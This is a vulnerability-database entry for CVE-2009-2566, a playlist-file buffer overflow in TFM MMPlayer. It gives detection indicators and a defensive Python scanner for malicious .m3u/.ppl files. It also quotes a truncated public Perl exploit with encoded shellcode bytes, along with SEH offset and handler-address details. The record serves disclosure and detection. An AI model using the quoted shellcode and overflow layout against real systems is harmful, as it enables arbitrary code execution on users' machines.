CVE-2009-2566
Published 2009-07-21

| Field | Value |
|---|---|
| Priority | P346 |
| Severity | critical (CVSS 2.0 base score 9.3) |
| CVSS 2.0 vector | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| Exploit | public exploit available (see Exploit-DB and Metasploit entries below) |
| EPSS | 31.07% (98.0th percentile) |
Stack-based buffer overflow in TFM MMPlayer 2.0, and possibly 2.0.0.30, allows remote attackers to execute arbitrary code via a long string in a playlist (.m3u) file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tfm | mmplayer | — | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- `\xEB\xED\x41\x42`
- `\xB4\x28\x40\x00` (the SEH handler address 0x004028B4 as little-endian bytes)
- `\xE9\x03\xF0\xFF\xFF`
- The exploit triggers via a malformed .m3u or .ppl playlist file containing an overly long string; monitor file-open events for MMPlayer processing .m3u/.ppl files with anomalously large content.
- The exploit payload is 4088+ bytes prepended with the marker string 'D_Z' before the shellcode; presence of this pattern in a .m3u/.ppl file is a strong indicator of exploitation.
- SEH overwrite at offset 4088 (minus shellcode length) with a hardcoded SEH handler address 0x004028B4; look for SEH chain corruption in MMPlayer process memory pointing to this address.
- The exploit uses a PexAlphaNum-encoded win32_exec shellcode (343 bytes) with EXITFUNC=seh; alphanumeric shellcode in a playlist file is anomalous and detectable via content inspection.
- The hardcoded SEH handler address (0x004028B4) is specific to TFM MMPlayer 2.0 on Windows XP Pro SP2 (Fr); this address will differ on other versions or service packs.
- The Metasploit module targets MMPlayer 2.2, while the NVD advisory references versions 2.0 and possibly 2.0.0.30; the exact vulnerable version range should be confirmed before deploying detections scoped to a specific version.
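As an added, defender-side example (not part of this CVE record, the Exploit-DB entry or the Metasploit module), a small Python scanner that checks the raw bytes of a playlist file for the indicators listed above; the long-entry threshold follows the 4088-byte SEH offset, while the alphanumeric-run threshold and the sample playlists are assumptions constructed for this example.

```python
"""Content-inspection scanner for TFM MMPlayer playlist indicators (CVE-2009-2566).

Added example, not vendor or project code. Checks an .m3u/.ppl file for the
indicators in the detection notes: an anomalously long entry, the 'D_Z'
marker, the hardcoded SEH handler address 0x004028B4 (little-endian bytes
B4 28 40 00) and a long alphanumeric run resembling PexAlphaNum shellcode.
"""
import re

MARKER = b"D_Z"                                     # marker string from the detection notes
SEH_HANDLER_LE = (0x004028B4).to_bytes(4, "little")  # b"\xb4\x28\x40\x00"
LONG_ENTRY_THRESHOLD = 4088                          # offset at which the SEH record is overwritten
ALNUM_RUN_THRESHOLD = 256                            # assumption: benign paths are far shorter
ALNUM_RUN = re.compile(rb"[A-Za-z0-9]{%d,}" % ALNUM_RUN_THRESHOLD)


def scan_playlist(data: bytes) -> list[str]:
    """Return the names of all indicators found in a playlist's raw bytes."""
    hits = []
    # Playlist entries are newline-separated; any entry at or past the SEH offset is anomalous.
    if any(len(line) >= LONG_ENTRY_THRESHOLD for line in data.splitlines()):
        hits.append("long_entry")
    if MARKER in data:
        hits.append("marker_D_Z")
    if SEH_HANDLER_LE in data:
        hits.append("seh_handler_0x004028B4")
    if ALNUM_RUN.search(data):
        hits.append("alphanumeric_blob")
    return hits


def is_suspicious(data: bytes) -> bool:
    """Flag a file when any indicator hits; a benign playlist hits none."""
    return bool(scan_playlist(data))


# Constructed samples for this example (no shellcode): a normal playlist and a
# crafted one that mirrors the structure described in the detection notes.
BENIGN_M3U = b"#EXTM3U\r\n#EXTINF:210,Track One\r\nC:\\Music\\track01.mp3\r\n"
CRAFTED_M3U = b"#EXTM3U\r\n" + MARKER + b"A" * 4088 + SEH_HANDLER_LE + b"\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_M3U), ("crafted", CRAFTED_M3U)):
        print(name, scan_playlist(sample))
```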
No detection rules found.
Exploit-DB
TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH) (exploitdb, 2009-06-30)
```perl
#!/usr/bin/perl
#[+] Bug : TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH)
#[+] Author : ThE g0bL!N
# # Greetz to all my friends
## Tested on: Windows XP Pro SP2 (Fr)
# Big Thnx :His0k4
#Download:http://www.tfm.ro/mmplayer/download/mmplayer.zip
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\
```
(listing truncated in the source)
Metasploit
TFM MMPlayer (m3u/ppl File) Buffer Overflow (metasploit)
This module exploits a buffer overflow in MMPlayer 2.2. The vulnerability is triggered when opening a malformed M3U/PPL file that contains an overly long string, which results in overwriting a SEH record, thus allowing arbitrary code execution under the context of the user.
No writeups or analysis indexed.